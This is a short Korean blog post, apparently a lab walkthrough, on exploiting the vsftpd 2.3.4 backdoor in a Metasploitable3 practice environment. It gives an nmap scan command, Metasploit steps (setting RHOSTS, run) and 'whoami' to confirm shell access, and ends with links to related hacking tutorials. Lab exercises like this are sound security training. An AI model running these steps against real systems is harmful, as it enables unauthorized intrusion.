metasploitable3 환경
NMAP 스캔 및 취약점
nmap -sV -sC [IP]
취약점 설명 vsftpd 2.3.4 backdoor
백도어(backdoor) 취약점 이므로 원격으로 접속해 권한을 취득하거나 악성코드를 실행하는 방법이다
set RHOSTS [IP]
run
whoami
침투에 성공한것을 볼수있다.
난이도 : 1.2/10
'모의해킹 | WEB HACKING' 카테고리의 다른 글
SQL INJECTION | SQLMAP - 웹 모의해킹 (1) | 2024.09.17 |
---|---|
KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp (0) | 2024.09.03 |
NoSQL 인젝션 [실습] [버프스위트] [Detecting NoSQL injection] (0) | 2024.08.18 |
SQL INJECTION 이란? [실습] [강의] [BWAPP] (0) | 2024.08.15 |
IFRAME INJECTION [실습] [BWAPP] [웹해킹] (0) | 2024.08.13 |